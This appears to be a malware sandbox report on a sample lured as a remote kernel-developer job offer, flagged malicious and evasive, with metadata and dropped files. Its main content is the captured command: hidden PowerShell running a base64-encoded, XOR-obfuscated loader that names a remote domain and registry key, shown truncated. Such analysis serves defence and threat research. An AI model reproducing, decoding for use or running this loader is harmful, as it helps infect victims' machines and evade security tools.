=
We are hiring! Windows Kernel Developer (Remote), apply here!
flash

cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuA... (truncated)

Status: finished
Submission Time: 2022-06-23 17:40:55 +02:00
Malicious
Evader

Comments

Tags

Details

  • Analysis ID:
    651250
  • API (Web) ID:
    1018754
  • Analysis Started:
    2022-06-23 17:40:55 +02:00
  • Analysis Finished:
    2022-06-23 17:44:57 +02:00
  • Technologies:
Full Report Management Report IOC Report Engine Info Verdict Score Reports

System: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)

malicious
52/100

Dropped files

Name File Type Hashes Detection
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TVQUNHR0LNB9QC6OSD3M.temp
data
#
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
#